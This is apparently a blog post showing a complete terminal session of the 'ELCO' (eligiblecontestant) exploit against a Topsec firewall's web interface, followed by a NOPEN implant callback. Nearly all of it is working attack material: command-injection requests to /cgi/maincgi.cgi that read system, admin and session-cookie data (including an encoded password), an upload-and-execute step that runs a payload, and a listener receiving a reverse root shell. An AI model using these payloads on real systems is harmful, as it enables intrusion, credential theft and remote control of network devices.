# Eligible Contestant (ELCO) exploit 


# cat ELCA.txt
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 19:14:54 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -t https://127.0.0.1:443 touch
[+] Seeded PRNG with 1471461306.3
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = False :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_touch>, host=' ', loadlast=False, mode='nopen', quiet=False, session=None, target='https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Requesting head https://127.0.0.1:443/site/image/white.gif with following provided settings: {'allow_redirects': False}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "HEAD /site/image/white.gif HTTP/1.1" 200 0
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- W/"3cd-345-4ce49cb1"
[+] Touch result: Header: date -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Touch result: HEAD /site/image/white.gif - 200
[+] Touch result: Header: last-modified -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: content-length -- 837
[+] Touch result: Header: etag -- W/"3cd-345-4ce49cb1"
[+] Touch result: Header: date -- Fri, 18 Aug 2006 19:07:33 GMT
[+] Touch result: Header: accept-ranges -- bytes
[+] Touch result: Header: content-type -- image/gif
[+] Touch result: Header: server -- Topsec
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201506.log and /current/down/fosho/2016-08-17-201506_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -l probe
[+] Seeded PRNG with 1471461312.61
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
['target']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_probe>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Scheduling cleanup in 60 seconds...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c (\tsleep\t60\t&&\trm\t-f\t/www/htdocs/site/pages/.JmiwrZV\t)'}}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+%28%09sleep%0960%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV%09%29 HTTP/1.1" 200 None
[+] Probing system and retrieving target info...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c (\tcat\t/e*/is*\t&&\tuname\t-a\t&&\t/t*/b*/cfgt*\tsystem\tadmininfo\tshowonline\t&&\tcat\t/*/*coo*/*\t)>/www/htdocs/site/pages/.JmiwrZV'}}
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+%28%09cat%09%2Fe%2A%2Fis%2A%09%26%26%09uname%09-a%09%26%26%09%2Ft%2A%2Fb%2A%2Fcfgt%2A%09system%09admininfo%09showonline%09%26%26%09cat%09%2F%2A%2F%2Acoo%2A%2F%2A%09%29%3E%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV HTTP/1.1" 200 None
[+] Requesting get https://127.0.0.1:443/site/pages/.JmiwrZV with following provided settings: {'allow_redirects': True}
[+] "GET /site/pages/.JmiwrZV HTTP/1.1" 200 584
[+] System information retrieved:
Topsec Operating System v3.3.006.076.1
Topsec Network Security Technology CO.,LTD
http://www.topsec.com.cn
Linux (none) 2.6.27 #1 Thu Nov 18 11:15:12 HKT 2010 i686 unknown
Manager_name       Auth_address       Privilege          Online_time(hh:mm:ss)

tosusername=test
tospassword=dGVzdA==
tosusertype=7
auth_id=47
g_vsid=0
logintime=1150174789
milsecond=956
refreshtimes=0
sys_setup=2
sys_maintainance=2
sys_monitor=2
network=2
policy=2
vpn=2
sslvpn=2
aaa_conf=2
log_conf=2
log_access=2
anti_virus=2
resource_conf=2
dpi_conf=2
pki_conf=2
ids_conf=2
anti_spam=2
ha_conf=2

[+] Forcing removal of temp file from target now...
[+] Requesting get https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'allow_redirects': True, 'params': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c killall\tsleep\t&&\trm\t-f\t/www/htdocs/site/pages/.JmiwrZV'}}
[+] "GET /cgi/maincgi.cgi?Url=Command&Action=sh&Para=sh+-c+killall%09sleep%09%26%26%09rm%09-f%09%2Fwww%2Fhtdocs%2Fsite%2Fpages%2F.JmiwrZV HTTP/1.1" 200 None
[-] User may be logged in. PLEASE REVIEW SYSTEM INFO
[+] Target is vulnerable. Safe to proceed.
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201512.log and /current/down/fosho/2016-08-17-201512_http.log

# LD_LIBRARY_PATH=/current/bin/lib ./eligiblecontestant.py -l exploit -c 127.0.0.1:1234
[+] Seeded PRNG with 1471461330.38
[+] Preparing to run specified command...
Exploit variables
=========================
   cert = None :: CA File
   target = https://127.0.0.1:443 :: Target to exploit. (Ex: https://127.0.0.1:1234)
   binpath = /current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static :: Path to tool being used.
   color = False :: Enable log output colors.
   verify = False :: Enable SSL verification
   tool = nopen :: No help available
   loadlast = True :: Load last session used.
   quiet = False :: Disable verbose logging
   ask = False :: Enable confirmation prompting before running commands.
   host =   :: Host header to use (default: empty
   session = None :: Use specified session file.
   mode = nopen :: Mode to use against target
   timeout = 120 :: Socket timeout
   debug = False :: Enable debug output. (Warning: prepare for spam)
   callback = 127.0.0.1:1234 :: Callback IP:Port for tool (Example: 127.0.0.1:12345)
['target', 'binpath', 'callback', 'mode']
Namespace(ask=False, binpath=u'/current/bin/noserver-3.0.5.3-i686.pc.linux.gnu.redhat-5.0-static', callback='127.0.0.1:1234', cert=None, color=False, debug=False, func=<unbound method ELCOExploit.do_exploit>, host=u' ', loadlast=True, mode=u'nopen', quiet=False, session=None, target=u'https://127.0.0.1:443', timeout=120, tool=u'nopen', verify=False)
[+] Uploading and running payload...
[+] Requesting post https://127.0.0.1:443/cgi/maincgi.cgi with following provided settings: {'files': {'vvnHD': <StringIO.StringIO instance at 0xb6d9454c>}, 'data': {'Url': 'Command', 'Action': 'sh', 'Para': 'sh -c rm\t-f\t/tmp/ht*;tar\txzvf\t`ls\t-c\t/tmp/cgi*|head\t-n\t1`\t-C\t/tmp/\t&&\tchmod\t+x\t/tmp/ht*;/tmp/htpd'}}
[+] Starting new HTTPS connection (1): 127.0.0.1
[+] "POST /cgi/maincgi.cgi HTTP/1.1" 200 None
[+] Exploit complete. Got root?
[+] Saving session info to .last_session
[+] Log files saved to /current/down/fosho/2016-08-17-201530.log and /current/down/fosho/2016-08-17-201530_http.log
# LD_LIBRARY_PATH=/current/bin/lib ./noclient -l 1234

NOPEN!                             v3.0.5.3

Wed Aug 17 19:14:54 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
NHOME=/current/bin/..
TERM=xterm-256color
Entering callback mode
Waiting...
Listening on *:1234... ok
Accepted connection from 127.0.0.1:39636
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0x1D1FFA80837E2AE0ED44E8C441F1405C
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version... 3.0.5.3

Connection
  Bytes In / Out     196/75 (261%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (127.0.0.1:1234)
  Remote Host:Port   127.0.0.1:0 (127.0.0.1:0)
  Remote Host:Port   (none):39636 (127.0.0.1:39636)
Local
  NOPEN client       3.0.5.3
  Date/Time          Wed Aug 17 19:15:34 UTC 2016
  History
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         4871 (4525)
Remote
  NOPEN server       3.0.5.3
  WDIR               NOT SET
  OS                 Linux 2.6.27 #1 Thu Nov 18 11:15:12 HKT 2010 i686
  CWD                /
  PID (PPID)         723 (1)

History loaded from "/current/bin/../down/history/(none).127.0.0.1"... ok
Creating command output file "/current/bin/../down/cmdout/(none).127.0.0.1-2016-08-17-19:15:35"... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! (none):/>
Posted by t0n1
Labels: , , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)